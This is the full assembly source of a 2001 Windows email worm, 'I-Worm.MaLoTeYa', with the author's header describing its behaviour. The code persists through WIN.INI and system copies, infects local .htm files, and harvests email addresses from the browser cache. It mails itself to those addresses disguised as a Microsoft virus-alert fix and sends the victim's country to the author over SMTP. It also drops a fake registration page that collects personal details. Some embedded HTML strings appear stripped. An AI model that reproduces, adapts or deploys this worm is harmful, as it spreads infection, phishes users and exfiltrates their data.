comment # Name : I-Worm.MaLoTeYa Author : PetiK Date : July 2nd - July 6th Size : 12288 byte Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the run= line and creates the VARegistered.htm file in the StartUp folder. This file send some informations to petik@multimania.com and displays a fake message. If the version of the platform is Windows 95/98, the file is a service process. It infects all *.htm and *.html file while writing at the end a VB script. It checks after if exist a internet connection and scans all *.htm* files in the "Temporary Internet Files" to find some EMail addreses and send a copy of itself. The worms sends equally an email to "petik@multimania.com" with the country of the user. When the user want to see the system properties, the title of the window is changed by "PetiK always is with you :-)". Greets to Benny, ZeMacroKiller98, Mandragore. tasm32 /M /ML Maloteya tlink32 -Tpe -aa -x Maloteya,,,import32 # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc ;---------------------------------------- ;Installation of the worm in the computer ;---------------------------------------- DEBUT: VERIF: push 00h callx GetModuleFileNameA push 50h push offset szOrig push eax callx GetModuleFileNameA push 50h push offset szCopie callx GetWindowsDirectoryA @pushsz "\RUNW32.EXE" push offset szCopie callx lstrcat push 50h push offset szCopb callx GetSystemDirectoryA @pushsz "\MSVA.EXE" push offset szCopb callx lstrcat push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz CACHE COPIE: push 00h push offset szCopie push offset szOrig callx CopyFileA push 00h push offset szCopb push offset szOrig callx CopyFileA WININI: push 50 push offset szWinini callx GetWindowsDirectoryA @pushsz "\\WIN.INI" push offset szWinini callx lstrcat push offset szWinini push offset szCopie @pushsz "run" @pushsz "windows" callx WritePrivateProfileStringA ;-------------------------------------------------- ;Create VARegistered.htm file in the StartUp folder ;-------------------------------------------------- C_GET: @pushsz "SHELL32.dll" callx LoadLibraryA mov SHELLhdl,eax @pushsz "SHGetSpecialFolderPathA" push SHELLhdl callx GetProcAddress mov getfolder,eax push 00h push 07h ; STARTUP Folder push offset StartUp push 00h call [getfolder] test eax,eax je F_HTM @pushsz "\VARegistered.htm" push offset StartUp callx lstrcat HTM: push 00h push 80h push 02h push 00h push 01h push 40000000h push offset StartUp callx CreateFileA mov [FileHdl],eax push 00h push offset octets push HTMTAILLE push offset htmd push [FileHdl] callx WriteFile push [FileHdl] callx CloseHandle F_HTM: push [SHELLhdl] callx FreeLibrary F_MESS: push 1000 callx Sleep push 1040h @pushsz "Microsoft Virus Alert" @pushsz "Your system does not appear infected with I-Worm.Magistr" push 00h callx MessageBoxA jmp FIN ;---------------------------------- ;Serivice process for Windows 95/98 ;---------------------------------- CACHE: @pushsz "KERNEL32.dll" callx GetModuleHandleA @pushsz "RegisterServiceProcess" push eax callx GetProcAddress xchg ecx,eax jecxz D_INF push 01h push 00h call ecx D_INF: push 50 push offset szCurrent callx GetCurrentDirectoryA push offset szCurrent callx SetCurrentDirectoryA ;--------------------------------------------- ;Infect all *.htm* files of the Windows folder ;--------------------------------------------- FFF: push offset Search @pushsz "*.htm*" ; Search some *.htm* files... callx FindFirstFileA inc eax je F_INF dec eax mov [htmlHdl],eax i_file: call infect ; and infect them push offset Search push [htmlHdl] callx FindNextFileA test eax,eax jne i_file push [htmlHdl] callx FindClose F_INF: ;----------------------- ; Check if we r conected ;----------------------- NET1: @pushsz "WININET.dll" callx LoadLibraryA test eax,eax jz FIN mov WNEThdl,eax @pushsz "InternetGetConnectedState" push WNEThdl callx GetProcAddress test eax,eax jz FIN mov netcheck,eax jmp NET2 NET2: push 00h push offset Temp call [netcheck] ; Connect to Internet ?? dec eax jnz NET2 FINNET: push [WNEThdl] callx FreeLibrary PAYS: push 50 push offset szSystemini callx GetWindowsDirectoryA @pushsz "\Win.ini" push offset szSystemini callx lstrcat push offset szSystemini push 20 push offset org_pays push offset Default @pushsz "sCountry" @pushsz "intl" callx GetPrivateProfileStringA ;------------------------------------------------------------------ ; Send the name of country to "petik@multomania.com" (perhaps bugs) ;------------------------------------------------------------------ SMTP: push offset WSA_Data ; Winsock push 0101h ; ver 1.1 (W95+) callx WSAStartup or eax,eax jnz INIT @pushsz "obelisk.mpt.com.uk" callx gethostbyname ; convert SMTP Name to an IP address xchg ecx,eax jecxz FREE_WIN ; Error ? mov esi,[ecx+12] ; Fetch IP address lodsd push eax pop [ServIP] push 00h ; Create Socket push 01h ; SOCK_STREAM push 02h ; AF_INET callx socket mov work_socket,eax inc eax jz FREE_WIN push 16 ; Sze of connect strucure call @1 ; Connect structure dw 2 ; Family db 0, 25 ; Port number ServIP dd 0 ; IP of server db 8 dup(0) ; Unused @1: push [work_socket] callx connect inc eax jz CLOSE_SOC lea esi,Send_M mov bl,6 Command_Loop: xor eax,eax call @2 ; Time-out: Time_Out: dd 5 ; Seconds dd 0 ; Milliseconds @2: push eax ; Not used (Error) push eax ; Not used (Writeability) call @3 Socket_Set: dd 1 ; Socket count work_socket dd 0 ; Socket @3: push eax ; Unused callx select dec eax jnz CLOSE_SOC push 00h push 512 ; Received data from socket push offset buf_recv push [work_socket] callx recv xchg ecx,eax ; Connection closed ? jecxz CLOSE_SOC inc ecx ; Error ? jz CLOSE_SOC or ebx,ebx ; Received stuff was QUIT jz CLOSE_SOC ; reply ? then close up. mov al,'2' ; "OK" reply cmp bl,2 ; Received stuff was the DATA jne Check_Reply ; reply ? inc eax Check_Reply: scasb je Wait_Ready lea esi,Send_M + (5*4) mov bl,1 Wait_Ready: xor ecx,ecx lea eax,Time_Out push eax push ecx ; not used (Error) lea eax,Socket_Set push eax ; Writeability push ecx ; Not used (Readability) push ecx ; Unused callx select dec eax ; Time-ouit ?? jnz CLOSE_SOC cld lodsd movzx ecx,ax shr eax,16 add eax,ebp push ecx ; Send command and data to the socket push 00h push ecx ; Size of buffer push eax ; Buffer push [work_socket] callx send pop ecx cmp eax,ecx jne CLOSE_SOC dec ebx jns Command_Loop CLOSE_SOC: push [work_socket] callx closesocket FREE_WIN: callx WSACleanup INIT: @pushsz "MAPI32.dll" callx LoadLibraryA test eax,eax jz FIN mov MAPIhdl,eax @pushsz "MAPISendMail" push MAPIhdl callx GetProcAddress test eax,eax jz FIN mov sendmail,eax D_GET: @pushsz "SHELL32.dll" callx LoadLibraryA mov SHELLhdl,eax @pushsz "SHGetSpecialFolderPathA" push SHELLhdl callx GetProcAddress mov getfolder,eax push 00h push 20h ; MSIE Cache Folder push offset Cache push 00h call [getfolder] push [SHELLhdl] callx FreeLibrary push offset Cache callx SetCurrentDirectoryA ;----------------------------------------------------------- ; Search email addresses into the "Temporary Internet Files" ;----------------------------------------------------------- FFF2: push offset Search @pushsz "*.htm*" callx FindFirstFileA inc eax je END_SPREAD dec eax mov [htmlHdl],eax i_htm: call infect2 push offset Search push [htmlHdl] callx FindNextFileA test eax,eax jne i_file push [htmlHdl] callx FindClose END_SPREAD: push [MAPIhdl] callx FreeLibrary ;--------------------------------------------------------------- ; Changes the title of the System Properties window on Wednesday ;--------------------------------------------------------------- DATE: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDayOfWeek],3 jne FIN WIN1: @pushsz "Propriétés Systême" push 00h callx FindWindowA test eax,eax jz WIN2 jmp WIN3 WIN2: @pushsz "System Properties" ; Change title some windows push 00h callx FindWindowA test eax,eax jz WIN1 WIN3: mov edi,eax @pushsz "PetiK always is with you :-)" push edi callx SetWindowTextA jmp WIN1 FIN: push 00h callx ExitProcess infect: pushad mov esi,offset Search.cFileName push esi callx GetFileAttributesA cmp eax,1 je end_infect push 00h push 80h push 03h push 00h push 01h push 40000000h push esi callx CreateFileA xchg eax,edi inc edi je end_infect dec edi push 02h ; FILE_END push 00h push [Dist] push edi callx SetFilePointer push 00h push offset octets push HTMSIZE push offset d_htm push edi callx WriteFile push edi callx CloseHandle push 01h ; READONLY push esi callx SetFileAttributesA end_infect: popad ret infect2:pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset Search.cFileName inc eax je END_SPREAD dec eax xchg eax,ebx xor eax,eax push eax push eax push eax push 02h ; PAGE_READONLY push eax push ebx callx CreateFileMappingA test eax,eax je F1 xchg eax,ebp xor eax,eax push eax push eax push eax push 04h ; FILE_MAP_READ push ebp callx MapViewOfFile test eax,eax je F2 xchg eax,esi push 00h push ebx callx GetFileSize xchg eax,ecx jecxz F3 d_scan_mail: call @melto db 'mailto:' @melto: pop edi scn_mail: pushad push 07h pop ecx rep cmpsb popad je scan_mail inc esi loop scn_mail F3: push esi callx UnmapViewOfFile F2: push ebp callx CloseHandle F1: push ebx callx CloseHandle popad ret scan_mail: xor edx,edx add esi,7 ; size of the string "mailto:" mov edi,offset m_addr push edi p_car: lodsb ; next character cmp al,' ' ; space ?? je car_s cmp al,'"' ; end character ?? je car_f cmp al,'''' ; end character ?? je car_f cmp al,'@' ; @ character ?? jne not_a inc edx not_a: stosb jmp p_car ; jmp to nxt char car_s: inc esi jmp p_car car_f: xor al,al stosb pop edi test edx,edx ; exist @ ?? je d_scan_mail call ENVOIE jmp d_scan_mail ENVOIE: xor eax,eax push eax push eax push offset Message push eax push [MAPIh] call [sendmail] ret .data namer db 50 dup (0) szCopb db 50 dup (0) szCopie db 50 dup (0) szCurrent db 50 dup (0) szOrig db 50 dup (0) szSystemini db 50 dup (0) szWinini db 50 dup (0) Cache db 70 dup (0) StartUp db 70 dup (0) m_addr db 128 dup (?) WSA_Data db 400 dup (0) buf_recv db 512 dup (0) Default db 0 FileHdl dd ? octets dd ? netcheck dd ? sendmail dd ? getfolder dd ? htmlHdl dd ? MAPIhdl dd ? SHELLhdl dd ? WNEThdl dd ? RegHdl dd ? Dist dd 0 Temp dd 0 MAPIh dd 0 WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h Origine db "Made In France",00h Message dd ? dd offset sujet dd offset corps dd ? dd offset date dd ? dd 2 ; MAPI_RECEIPT_REQUESTED ?? dd offset MsgFrom dd 1 ; MAPI_UNREAD ?? dd offset MsgTo dd 1 dd offset AttachDesc MsgFrom dd ? dd ? dd offset NameFrom dd offset MailFrom dd ? dd ? MsgTo dd ? dd 1 ; MAIL_TO dd offset NameTo dd offset m_addr dd ? dd ? AttachDesc dd ? dd ? dd ? ; character in text to be replaced by attachment dd offset szCopb ; Full path name of attachment file dd ? dd ? sujet db "New Virus Alert !!",00h corps db "This is a fix against I-Worm.Magistr.",0dh,0ah db "Run the attached file (MSVA.EXE) to detect, repair and " db "protect you against this malicious worm.",00h date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM NameFrom db "Microsoft Virus Alert" MailFrom db "virus_alert@microsoft.com",00h NameTo db "Customer",00h Send_M: dw fHELO-dHELO dw fFROM-dFROM dw fRCPT-dRCPT dw fDATA-dDATA dw fMAIL-dMAIL dw fQUIT-dQUIT dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah fHELO: dFROM db 'MAIL FROM:',0dh,0ah fFROM: dRCPT db 'RCPT TO:',0dh,0ah fRCPT: dDATA db 'DATA',0dh,0ah fDATA: dMAIL: db 'From: "MaLoTeYa",',0dh,0ah db 'Subject: Long Live the Worm',0dh,0ah db 'Pays d''origine : ' org_pays db 20 dup (0) db '',0dh,0ah db '.',0dh,0ah fMAIL: dQUIT db 'QUIT',0dh,0ah fQUIT: htmd: db "Virus Alert Registration",0dh,0ah db "",0dh,0ah db "",0dh,0ah db "

Microsoft Virus Alert Registration

",0dh,0ah db "

Please fill out this form. ",0dh,0ah db "You must be connected to internet.

",0dh,0ah db "

",0dh,0ah db "
",0dh,0ah db "

Name :

",0dh,0ah db "

Firstname :

",0dh,0ah db "

City :

",0dh,0ah db "

Country :

",0dh,0ah db "

E-Mail :

",0dh,0ah db "

",0dh,0ah db "

",0dh,0ah db "

AFTER REGISTRATION YOU CAN DELETE THIS FILE

",0dh,0ah db "
",00h HTMTAILLE equ $-htmd d_htm: db "",0dh,0ah,0dh,0ah db "",0dh,0ah HTMSIZE equ $-d_htm OSVERSIONINFO struct dwOSVersionInfoSize dd ? dwMajorVersion dd ? dwMinorVersion dd ? dwBuildNumber dd ? dwPlatformId dd ? szCSDVersion db 128 dup (?) OSVERSIONINFO ends SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends MAX_PATH equ 260 FILETIME struct dwLowDateTime dd ? dwHighDateTime dd ? FILETIME ends WIN32_FIND_DATA struct dwFileAttributes dd ? ftCreationTime FILETIME ? ftLastAccessTime FILETIME ? ftLastWriteTime FILETIME ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName dd MAX_PATH (?) cAlternateFileName db 13 dup (?) db 3 dup (?) WIN32_FIND_DATA ends OSVer OSVERSIONINFO <> SystemTime SYSTIME <> Search WIN32_FIND_DATA <> end DEBUT end